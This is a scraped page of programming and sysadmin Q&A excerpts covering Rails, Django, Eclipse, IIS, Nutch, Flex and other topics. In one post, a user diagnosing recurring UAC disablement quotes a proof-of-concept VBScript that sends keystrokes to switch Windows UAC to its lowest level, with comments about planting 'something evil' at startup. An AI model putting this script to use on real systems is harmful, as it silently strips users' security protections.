Search Results

Search found 16435 results on 658 pages for 'portable applications'.

Page 584/658 | < Previous Page | 580 581 582 583 584 585 586 587 588 589 590 591  | Next Page >

• rails best practices where to place unobtrusive javascript

  - by nathanvda

  Hi there, my rails applications (all 2.3.5) use a total mix of inline javascript, rjs, prototype and jquery. Let's call it learning or growing pains. Lately i have been more and more infatuated with unobtrusive javascript. It makes your html clean, in the same way css cleaned it up. But most examples i have seen are small examples, and they put all javascript(jquery) inside application.js Now i have a pretty big application, and i am thinking up ways to structure my js. I like somehow that my script is still close to the view, so i am thinking something like orders.html.erb orders.js where orders.js contains the unobtrusive javascript specific to that view. But maybe that's just me being too conservative :) I have read some posts by Yehuda Katz about this very problem here and here, where he tackles this problem. It will go through your js-files and only load those relevant to your view. But alas i can't find a current implementation. So my questions: how do you best structure your unobtrusive javascript; manage your code, how do you make sure that it is obvious from the html what something is supposed to do. I guess good class names go a long way :) how do you arrange your files, load them all in? just a few? do you use content_for :script or javascript_include_tag in your view to load the relevant scripts. Or ... ? do you write very generic functions (like a delete), with parameters (add extra attributes?), or do you write very specific functions (DRY?). I know in Rails 3 there is a standard set, and everything is unobtrusive there. But how to start in Rails 2.3.5? In short: what are the best practices for doing unobtrusive javascript in rails? :)

  Read the article

• Linux Lightweight Distro and X Windows for Development

  - by Fernando Barrocal

  Heyall... I want to build a lightweight linux configuration to use for development. The first idea is to use it inside a Virtual Machine under Windows, or old Laptops with 1Gb RAM top. Maybe even a distributable environment for developers. So the whole idea is to use a LAMP server, Java Application Server (Tomcat or Jetty) and X Windows (any Window manager, from FVWM to Enlightment), Eclipse, maybe jEdit and of course Firefox. Edit: I am changing this post to compile a possible list of distros and window managers that can be used to configure a real lightweight development environment. I am using as base personal experiences on this matter. Info about the distros can be easily found in their sites. So please, focus on personal use of those systems Distros Ubuntu / Xubuntu Pros: Personal Experience in old systems or low RAM environment - @Schroeder, @SCdF Several sugestions based on personal knowledge - @Kyle, @Peter Hoffmann Gentoo Pros: Not targeted to Desktop Users - @paan Don't come with a huge ammount of applications - @paan Slackware Pros: Suggested as best performance in a wise install/configuration - @Ryan Damn Small Linux Pros: Main focus is the lightweight factor - 50MB LiveCD - @Ryan Debian Pros: Very versatile, can be configured for both heavy and lightweight computers - @Ryan APT as package manager - @Kyle Based on compatibility and usability - @Kyle -- Fell Free to add Prós and Cons on this, so we can compile a good Reference. -- X Windows suggestion keep coming about XFCE. If others are to add here, open a session for it Like the distro one :)

  Read the article

• Enterprise Eclipse Provisioning - Or - How to share your standard Eclipse setup with other developer

  - by nikhil

  We use Eclipse as the IDE for developing all sorts of Java/J2EE applications in our 150 people odd IT department. One of the common problems we have been seeing is that developers download and install different versions of Eclipse and plugins based on their personal likes and dislikes. We have been trying to bring some consistency to this and have standardized on the version and the plugins that developers should be using. So the problem now is how do we distribute this installation to the team. We have zipped the directories and shared it through a shared drive. But I am looking for a better solution using some kind of provisioning tool for Eclipse using which people can install the IDE or get updates. Has anyone faced this problem? What are your solutions to this? How do you ensure a standard Eclipse environment across developers? I found Yoxos as a potential solution to this. Does anyone have any experience with it? Can p2 be used to do this?

  Read the article

• Node.js running under IIS Express Keeps Crashing

  - by PazoozaTest Pazman

  I recently resinstalled Windows 7 on my machine and went back to downloading and installing the tools to help me continue developing node.js windows azure web applications. I followed the instructions given on the node.js azure site: http://www.windowsazure.com/en-us/develop/nodejs/ and using web installer 4.0 it says I have successfully installed these tools: Windows Azure Powershell Windows Azure SDK for Node.js - June 2012 Windows Azure SDK for .Net (VS 2012 RC) - June 2012 IIS Recommend Configuration The problem I am experiencing is that when I run the site using powershell e.g: start-azureemulator -launch it goes ahead and runs IIS Express, and after several minutes IIS Express crashes with the following information: Problem signature: Problem Event Name: APPCRASH Application Name: iisexpress.exe Application Version: 8.0.8298.0 Application Timestamp: 4f620349 Fault Module Name: iiscore.dll Fault Module Version: 8.0.8298.0 Fault Module Timestamp: 4f63b65c Exception Code: c0000005 Exception Offset: 00021767 OS Version: 6.1.7601.2.1.0.256.28 Locale ID: 1033 Additional Information 1: f66d Additional Information 2: f66d807b515d6b2dc6f28f66db769a01 Additional Information 3: 7b2f Additional Information 4: 7b2f6797d07ebc2c23f2b227e779722e I am running 2 instances each time, and both of them crash one after the other. Is anyone experiencing something similar and fix this issue ? Is their an upgrade I need to do ? I've run windows update but it says I've got all the latest updates etc. Can I tell the powershell cmdlet to use IIS 7 instead of IIS Express? I'm guessing its something to do with IIS Express on my machine. I did some hunting around and found this person here who experienced a similar problem: https://github.com/tjanczuk/iisnode/issues/149 I've got a cron job running every 1 second, to check if any website totals need to be updated. Could this be causing IIS Express to crash? Cheers

  Read the article

• How do I get the Silverlight Add-On for Visual Studio 2010 and some example code?

  - by xarzu

  How do I get the Silverlight Add-On for Visual Studio 2010? And where can I find lots of example code? When the interent and html was new, one could find examples of how to build a website on a few trusted web sites. The same web sites might not be the best choice for looking for examples for Silverlight, I guess. What are the best web sites where you can look at examples -- and most importantly -- look at the source code of some examples of Silverlight? Back when MFC existed as a option that programmers might use to develop windows applications, a coder could look at a huge list of sample code and step through that code to find something that somewhat did what he was looking for and use that example code to build his own app. Is there anything like that for Silverlight? I have found the http://gallery.expression.microsoft.com/ Expression Blend Gallery and I have found the http://www.silverlight.net/community/samples/silverlight-samples/ Silverlight dot net community samples. I guess that will keep me busy for a while. Are there other sites? There are video instructions on MSDN's Channel9: http://channel9.msdn.com/tags/curso-silverlight-4/ Are there any videos in English? The video instructions look very good. Where is the links to the English versions? I was suggested this site for learning silverlight: http://channel9.msdn.com/learn/courses/Silverlight4/ This online documentation mentions "The Silverlight 4 Tools for Visual Studio 2010" which "is an add-on for Visual Studio 2010 that provides tooling for Microsoft Silverlight 4 and WCF RIA Services. It can be installed on top of either Visual Studio 2010 or Visual Web Developer 2010 Express" where can I find this? Is it shipped with Visual Studio 2010?

  Read the article

• Which Django 1.2.x multilingual application to use?

  - by mawimawi

  There are a couple of different applications for internationalized content in Django. As of now I only have used http://code.google.com/p/django-multilingual/ in my production environments, but I wonder if there are "better" solutions for my wishes. What my staff users need is the following: An object is being created by a staff user in any language (e.g. "de") This object should be displayed in the german version of the website. When a staff user translates the object into a different language (e.g. "fr"), then the page must be visible in the french version as well. If an object is not translated in the visitor's currently selected language (e.g. "en"), then calling the objects url shall raise a 404 Error (or even better a notice that the object is only available in the languages "de" and "fr", and the visitor might be able to select one of the languages) My staff users are working in the admin interface, so the multilingual application must support this as well. I don't really care whether the multilingual app uses a single table with many fields (like title_en, title_de, title_fr) or a foreign key to a related table (as it is implemented in django-multlingual). I only want it to have a good admin interface and no "default" language, because some content might be available just in "de", and some other just in "fr" and "en". And the most important issue of course is compatibility with Django 1.2.x. What are your experiences and preferred apps, and why?

  Read the article

• Django deployment - can't import app.urls

  - by hora

  I just moved a django project to a deployment server from my dev server, and I'm having some issues deploying it. My apache config is as follows: <Location "/"> Order allow,deny Allow from all SetHandler python-program PythonHandler django.core.handlers.modpython SetEnv DJANGO_SETTINGS_MODULE project.settings PythonDebug On PythonPath "['/home/django/'] + sys.path" </Location> Django does work, since it renders the Django debug views, but I get the following error: ImportError at / No module named app.urls And here is all the information Django gives me: Request Method: GET Request URL: http://myserver.com/ Django Version: 1.1.1 Python Version: 2.6.5 Installed Applications: ['django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.admin', 'django.contrib.admindocs', 'project.app'] Installed Middleware: ('django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware') Traceback: File "/usr/lib64/python2.6/site-packages/django/core/handlers/base.py" in get_response 83. request.path_info) File "/usr/lib64/python2.6/site-packages/django/core/urlresolvers.py" in resolve 218. sub_match = pattern.resolve(new_path) File "/usr/lib64/python2.6/site-packages/django/core/urlresolvers.py" in resolve 216. for pattern in self.url_patterns: File "/usr/lib64/python2.6/site-packages/django/core/urlresolvers.py" in _get_url_patterns 245. patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) File "/usr/lib64/python2.6/site-packages/django/core/urlresolvers.py" in _get_urlconf_module 240. self._urlconf_module = import_module(self.urlconf_name) File "/usr/lib64/python2.6/site-packages/django/utils/importlib.py" in import_module 35. __import__(name) Exception Type: ImportError at / Exception Value: No module named app.urls Any ideas as to why I get an import error?

  Read the article

• Application icons for Flex mobile app targeting Android and iOS

  - by Alexander Farber

  The Adobe doc Developing AIR applications for mobile devices lists quite a few icons to be declared in an application descriptor file. But when I try Export Release Build with the following myApp-app.xml: <icon> <image16x16>assets/icons/16x16.png</image16x16> <image29x29>assets/icons/29x29.png</image29x29> <image32x32>assets/icons/32x32.png</image32x32> <image36x36>assets/icons/36x36.png</image36x36> <image48x48>assets/icons/48x48.png</image48x48> <image57x57>assets/icons/57x57.png</image57x57> <image72x72>assets/icons/72x72.png</image72x72> <image114x114>assets/icons/114x114.png</image114x114> <image128x128>assets/icons/128x128.png</image128x128> <image512x512>assets/icons/512x512.png</image512x512> <!-- <image50x50>assets/icons/50x50.png</image50x50> <image58x58>assets/icons/58x58.png</image58x58> <image100x100>assets/icons/100x100.png</image100x100> <image144x144>assets/icons/144x144.png</image144x144> <image1024x1024>assets/icons/1024x1024.png</image1024x1024> --> </icon> I get the error message (regardless if deploying for Android or iOS) unless I comment the 5 lines as above: error 103: application.icon.image50x50 is an unexpected element/attribute error 103: application.icon.image58x58 is an unexpected element/attribute error 103: application.icon.image100x100 is an unexpected element/attribute error 103: application.icon.image1024x1024 is an unexpected element/attribute error 103: application.icon.image144x144 is an unexpected element/attribute My question is what to do here? Moving those 5 icons underneath <android>....</android> or <iphone>....</iphone> doesn't help either. Using Flash Builder 4.7 beta under Windows 7 / 64 bit.

  Read the article

• Objective-C Simple Inheritance and OO Principles

  - by bleeckerj

  I have a subclass SubClass that inherits from baseclass BaseClass. BaseClass has an initializer, like so: -(id)init { self = [super init]; if(self) { [self commonInit]; } return self; } -(void)commonInit { self.goodStuff = [[NSMutableArray alloc]init]; } SubClass does its initializer, like so: -(id)init { self = [super init]; if(self) { [self commonInit]; } return self; } -(void)commonInit { self.extraGoodStuff = [[NSMutableArray alloc]init]; } Now, I've *never taken a proper Objective-C course, but I'm a programmer more from the Electrical Engineering side, so I make do. I've developed server-side applications mostly in Java though, so I may be seeing the OO world through Java principles. When SubClass is initialized, it calls the BaseClass init and my expectation would be — because inheritance to me implies that characteristics of a BaseClass pass through to SubClass — that the commonInit method in BaseClass would be called during BaseClass init. It is not. I can *sorta understand maybe-possibly-stretch-my-imagination why it wouldn't be. But, then — why wouldn't it be based on the principles of OOP? What does "self" represent if not the instance of the class of the running code? Okay, so — I'm not going to argue that what a well-developed edition of Objective-C is doing is wrong. So, then — what is the pattern I should be using in this case? I want SubClass to have two main bits — the goodStuff that BaseClass has as well as the extraGoodStuff that it deserves as well. Clearly, I've been using the wrong pattern in this type of situation. Am I meant to expose commonInit (which makes me wonder about encapsulation principles — why expose something that, in the Java world at least, would be considered "protected" and something that should only ever be called once for each instance)? I've run into a similar problem in the recent past and tried to muddle through it, but now — I'm really wondering if I've got my principles and concepts all straight in my head. Little help, please.

  Read the article

• Game login authentication and security.

  - by Charles

  First off I will say I am completely new to security in coding. I am currently helping a friend develop a small game (in Python) which will have a login server. I don't have much knowledge regarding security, but I know many games do have issues with this. Everything from 3rd party applications (bots) to WPE packet manipulation. Considering how small this game will be and the limited user base, I doubt we will have serious issues, but would like to try our best to limit problems. I am not sure where to start or what methods I should use, or what's worth it. For example, sending data to the server such as login name and password. I was told his information should be encrypted when sending, so in-case someone was viewing it (with whatever means), that they couldn't get into the account. However, if someone is able to capture the encrypted string, wouldn't this string always work since it's decrypted server side? In other words, someone could just capture the packet, reuse it, and still gain access to the account? The main goal I am really looking for is to make sure the players are logging into the game with the client we provide, and to make sure it's 'secure' (broad, I know). I have looked around at different methods such as Public and Private Key encryption, which I am sure any hex editor could eventually find. There are many other methods that seem way over my head at the moment and leave the impression of overkill. I realize nothing is 100% secure. I am just looking for any input or reading material (links) to accomplish the main goal stated above. Would appreciate any help, thanks.

  Read the article

• Search for string allowing for one mismatches in any location of the string, Python

  - by Vincent

  I am working with DNA sequences of length 25 (see examples below). I have a list of 230,000 and need to look for each sequence in the entire genome (toxoplasma gondii parasite) I am not sure how large the genome is but much more that 230,000 sequences. I need to look for each of my sequences of 25 characters example(AGCCTCCCATGATTGAACAGATCAT). The genome is formatted as a continuous string ie (CATGGGAGGCTTGCGGAGCCTGAGGGCGGAGCCTGAGGTGGGAGGCTTGCGGAGTGCGGAGCCTGAGCCTGAGGGCGGAGCCTGAGGTGGGAGGCTT.........) I don't care where or how many times it is found, just yes or no. This is simple I think, str.find(AGCCTCCCATGATTGAACAGATCAT) But I also what to find a close match defined as wrong(mismatched) at any location but only 1 location and record the location in the sequnce. I am not sure how do do this. The only thing I can think of is using a wildcard and performing the search with a wildcard in each position. ie search 25 times. For example AGCCTCCCATGATTGAACAGATCAT AGCCTCCCATGATAGAACAGATCAT close match with a miss-match at position 13 Speed is not a big issue I am only doing it 3 times. i hope but it would be nice it was fast. The are programs that do this find matches and partial matches but I am looking for a type of partial match that is not available with these applications. Here is a similar post for pearl but they are only comparing sequnces not searching a continuous string Related post

  Read the article

• UAC being turned off once a day on Windows 7

  - by Mehper C. Palavuzlar

  I have strange problem on my HP laptop. This began to happen recently. Whenever I start my machine, Windows 7 Action Center displays the following warning: You need to restart your computer for UAC to be turned off. Actually, this does not happen if it happened once on a specific day. For example, when I start the machine in the morning, it shows up; but it never shows up in the subsequent restarts within that day. On the next day, the same thing happens again. I never disable UAC, but obviously some rootkit or virus causes this. As soon as I get this warning, I head for the UAC settings, and re-enable UAC to dismiss this warning. This is a bothersome situation as I can't fix it. First, I have run a full scan on the computer for any probable virus and malware/rootkit activity, but TrendMicro OfficeScan said that no viruses have been found. I went to an old Restore Point using Windows System Restore, but the problem was not solved. What I have tried so far (which couldn't find the rootkit): TrendMicro OfficeScan Antivirus AVAST Malwarebytes' Anti-malware Ad-Aware Vipre Antivirus GMER TDSSKiller (Kaspersky Labs) HiJackThis RegRuns UnHackMe SuperAntiSpyware Portable Tizer Rootkit Razor (*) Sophos Anti-Rootkit SpyHunter 4 There are no other strange activities on the machine. Everything works fine except this bizarre incident. What could be the name of this annoying rootkit? How can I detect and remove it? EDIT: Below is the log file generated by HijackThis: Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 13:07:04, on 17.01.2011 Platform: Windows 7 (WinNT 6.00.3504) MSIE: Internet Explorer v8.00 (8.00.7600.16700) Boot mode: Normal Running processes: C:\Windows\system32\taskhost.exe C:\Windows\system32\Dwm.exe C:\Windows\Explorer.EXE C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.Exe C:\Windows\System32\igfxtray.exe C:\Windows\System32\hkcmd.exe C:\Windows\system32\igfxsrvc.exe C:\Windows\System32\igfxpers.exe C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe C:\Program Files\Synaptics\SynTP\SynTPEnh.exe C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe C:\Program Files\Analog Devices\Core\smax4pnp.exe C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\VolCtrl.exe C:\Program Files\LightningFAX\LFclient\lfsndmng.exe C:\Program Files\Common Files\Java\Java Update\jusched.exe C:\Program Files\Microsoft Office Communicator\communicator.exe C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe C:\Program Files\Trend Micro\OfficeScan Client\PccNTMon.exe C:\Program Files\Microsoft LifeCam\LifeExp.exe C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe C:\Program Files\Windows Sidebar\sidebar.exe C:\Program Files\mimio\mimio Studio\system\aps_tablet\atwtusb.exe C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE C:\Program Files\Babylon\Babylon-Pro\Babylon.exe C:\Program Files\Mozilla Firefox\firefox.exe C:\Users\userx\Desktop\HijackThis.exe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://www.yaysat.com.tr/proxy/proxy.pac R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: Babylon IE plugin - {9CFACCB6-2F3F-4177-94EA-0D2B72D384C1} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe O4 - HKLM\..\Run: [QlbCtrl.exe] C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe" O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" O4 - HKLM\..\Run: [lfsndmng] C:\Program Files\LightningFAX\LFclient\LFSNDMNG.EXE O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe" O4 - HKLM\..\Run: [Communicator] "C:\Program Files\Microsoft Office Communicator\communicator.exe" /fromrunkey O4 - HKLM\..\Run: [AgentUiRunKey] "C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe" -ni -sss -e http://localhost:16386/ O4 - HKLM\..\Run: [OfficeScanNT Monitor] "C:\Program Files\Trend Micro\OfficeScan Client\pccntmon.exe" -HideWindow O4 - HKLM\..\Run: [Babylon Client] C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe" O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun O4 - Global Startup: mimio Studio.lnk = C:\Program Files\mimio\mimio Studio\mimiosys.exe O8 - Extra context menu item: Microsoft Excel'e &Ver - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000 O8 - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm O8 - Extra context menu item: Translate with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL O9 - Extra button: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll O9 - Extra 'Tools' menuitem: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll O16 - DPF: {00134F72-5284-44F7-95A8-52A619F70751} (ObjWinNTCheck Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/WinNTChk.cab O16 - DPF: {08D75BC1-D2B5-11D1-88FC-0080C859833B} (OfficeScan Corp Edition Web-Deployment SetupCtrl Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/setup.cab O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = yaysat.com O17 - HKLM\Software\..\Telephony: DomainName = yaysat.com O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = yaysat.com O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = yaysat.com O18 - Protocol: qcom - {B8DBD265-42C3-43E6-B439-E968C71984C6} - C:\Program Files\Common Files\Quest Shared\CodeXpert\qcom.dll O22 - SharedTaskScheduler: FencesShellExt - {1984DD45-52CF-49cd-AB77-18F378FEA264} - C:\Program Files\Stardock\Fences\FencesMenu.dll O23 - Service: Andrea ADI Filters Service (AEADIFilters) - Andrea Electronics Corporation - C:\Windows\system32\AEADISRV.EXE O23 - Service: AgentService - Iron Mountain Incorporated - C:\Program Files\Iron Mountain\Connected BackupPC\AgentService.exe O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - LSI Corporation - C:\Program Files\LSI SoftModem\agrsmsvc.exe O23 - Service: BMFMySQL - Unknown owner - C:\Program Files\Quest Software\Benchmark Factory for Databases\Repository\MySQL\bin\mysqld-max-nt.exe O23 - Service: Com4QLBEx - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe O23 - Service: OfficeScanNT RealTime Scan (ntrtscan) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\ntrtscan.exe O23 - Service: SMS Task Sequence Agent (smstsmgr) - Unknown owner - C:\Windows\system32\CCM\TSManager.exe O23 - Service: Check Point VPN-1 Securemote service (SR_Service) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Service.exe O23 - Service: Check Point VPN-1 Securemote watchdog (SR_Watchdog) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Watchdog.exe O23 - Service: Trend Micro Unauthorized Change Prevention Service (TMBMServer) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\..\BM\TMBMSRV.exe O23 - Service: OfficeScan NT Listener (tmlisten) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\tmlisten.exe O23 - Service: OfficeScan NT Proxy Service (TmProxy) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\TmProxy.exe O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe -- End of file - 8204 bytes As suggested in this very similar question, I have run full scans (+boot time scans) with RegRun and UnHackMe, but they also did not find anything. I have carefully examined all entries in the Event Viewer, but there's nothing wrong. Now I know that there is a hidden trojan (rootkit) on my machine which seems to disguise itself quite successfully. Note that I don't have the chance to remove the HDD, or reinstall the OS as this is a work machine subjected to certain IT policies on a company domain. Despite all my attempts, the problem still remains. I strictly need a to-the-point method or a pukka rootkit remover to remove whatever it is. I don't want to monkey with the system settings, i.e. disabling auto runs one by one, messing the registry, etc. EDIT 2: I have found an article which is closely related to my trouble: Malware can turn off UAC in Windows 7; “By design” says Microsoft. Special thanks(!) to Microsoft. In the article, a VBScript code is given to disable UAC automatically: '// 1337H4x Written by _____________ '// (12 year old) Set WshShell = WScript.CreateObject("WScript.Shell") '// Toggle Start menu WshShell.SendKeys("^{ESC}") WScript.Sleep(500) '// Search for UAC applet WshShell.SendKeys("change uac") WScript.Sleep(2000) '// Open the applet (assuming second result) WshShell.SendKeys("{DOWN}") WshShell.SendKeys("{DOWN}") WshShell.SendKeys("{ENTER}") WScript.Sleep(2000) '// Set UAC level to lowest (assuming out-of-box Default setting) WshShell.SendKeys("{TAB}") WshShell.SendKeys("{DOWN}") WshShell.SendKeys("{DOWN}") WshShell.SendKeys("{DOWN}") '// Save our changes WshShell.SendKeys("{TAB}") WshShell.SendKeys("{ENTER}") '// TODO: Add code to handle installation of rebound '// process to continue exploitation, i.e. place something '// evil in Startup folder '// Reboot the system '// WshShell.Run "shutdown /r /f" Unfortunately, that doesn't tell me how I can get rid of this malicious code running on my system. EDIT 3: Last night, I left the laptop open because of a running SQL task. When I came in the morning, I saw that UAC was turned off. So, I suspect that the problem is not related to startup. It is happening once a day for sure no matter if the machine is rebooted.

  Read the article

• crawl websites out of java web application without using bin/nutch

  - by Marcel

  hi :) i am trying to using nutch (1.1) without bin/nutch from my (java) mojarra 2.0.2 webapp... i am searching at google for examples, but there are no examples how i can realize this :/ ... i get an exception and the job fails :/ (i think of cause something with hadoop)... here is my code: public void run() throws Exception { final String[] args = new String[] { String.format("%s%s%s%s", JSFUtils.getWebAppRoot(), "nutch", File.separator, DIRECTORY_URLS), "-dir", String.format("%s%s%s%s", JSFUtils.getWebAppRoot(), "nutch", File.separator, DIRECTORY_CRAWL), "-threads", this.preferences.get("threads"), "-depth", this.preferences.get("depth"), "-topN", this.preferences.get("topN"), "-solr", this.preferences.get("solr") }; Crawl.main(args); } and a part of the logging: 10/05/17 10:42:54 INFO jvm.JvmMetrics: Initializing JVM Metrics with processName=JobTracker, sessionId= 10/05/17 10:42:54 WARN mapred.JobClient: Use GenericOptionsParser for parsing the arguments. Applications should implement Tool for the same. 10/05/17 10:42:54 INFO mapred.FileInputFormat: Total input paths to process : 1 10/05/17 10:42:54 INFO mapred.JobClient: Running job: job_local_0001 10/05/17 10:42:54 INFO mapred.FileInputFormat: Total input paths to process : 1 10/05/17 10:42:55 INFO mapred.MapTask: numReduceTasks: 1 10/05/17 10:42:55 INFO mapred.MapTask: io.sort.mb = 100 java.io.IOException: Job failed! at org.apache.hadoop.mapred.JobClient.runJob(JobClient.java:1232) at org.apache.nutch.crawl.Injector.inject(Injector.java:211) at org.apache.nutch.crawl.Crawl.main(Crawl.java:124) at lan.localhost.process.NutchCrawling.run(NutchCrawling.java:108) at lan.localhost.main.Index.indexing(Index.java:71) at lan.localhost.bean.FeedingBean.actionStart(FeedingBean.java:25) .... can someone help me or tell me how i can crawling from a java application? i have increased the Xms to 256m and Xmx to 768m, but nothing changed... best regards marcel

  Read the article

• check status application pool iis7 with csharp (access-denied)

  - by jack

  I need to monitor the status of an application in the applications pool of IIS 7 from an other machine on the same domain. My monitoring application must be in C# and running as a Windows service. On my server, I create a user with administration rights and I execute the command aspnet_regiis -ga machine\username wich worked succesfully. My problem is when I try to access the application pool i still get COMExcepttion "Access denied". What did i do wrong or wich step did i miss? I used code from http://patelshailesh.com/index.php/create-a-website-application-pool-programmatically-using-csharp as example. int status = 0; string ipAddress = "10.20.2.13"; string username = "username"; string password = "password"; try { DirectoryEntry de = new DirectoryEntry(string.Format("IIS://{0}/W3SVC/AppPools/MyAppPoolName", ipAddress), username, password); //the exception is thron here. status = (int)de.InvokeGet("AppPoolState"); switch (status) { case 2: //Runnig break; case 4: //Stopped break; default: break; } } catch (Exception ex) { }

  Read the article

• Why Java language does not offer a way to declare getters and setters of a given "field" through ann

  - by zim2001

  I actually happily design and develop JEE Applications for quite 9 years, but I realized recently that as time goes by, I feel more and more fed up of dragging all these ugly bean classes with their bunch of getters and setters. Considering a basic bean like this : public class MyBean { // needs getter AND setter private int myField1; // needs only a getter, no setter private int myField2; // needs only a setter, no getter private int myField3; /** * Get the field1 * @return the field1 */ public int getField1() { return myField1; } /** * Set the field1 * @param value the value */ public void setField1(int value) { myField1 = value; } /** * Get the field2 * @return the field2 */ public int getField2() { return myField2; } /** * Set the field3 * @param value the value */ public void setField3(int value) { myField3 = value; } } I'm dreaming of something like this : public class MyBean { @inout(public,public) private int myField1; @out(public) private int myField2; @in(public) private int myField3; } No more stupid javadoc, just tell the important thing... It would still be possible to mix annotation and written down getters or setters, to cover cases when it should do non-trivial sets and gets. In other words, annotation would auto-generate the getter / setter code piece except when a literate one is provided. Moreover, I'm also dreaming of replacing things like that : MyBean b = new MyBean(); int v = b.getField1(); b.setField3(v+1); by such : MyBean b = new MyBean(); int v = b.field1; b.field3 = v+1; In fact, writing "b.field1" on the right side of an expression would be semantically identical to write "b.getField1()", I mean as if it has been replaced by some kind of a preprocessor. It's just an idea but I'm wondering if I'm alone on that topic, and also if it has major flaws. I'm aware that this question doesn't exactly meet the SO credo (we prefer questions that can be answered, not just discussed) so I flag it community wiki...

  Read the article

• Help setting up command line gist

  - by smotchkkiss

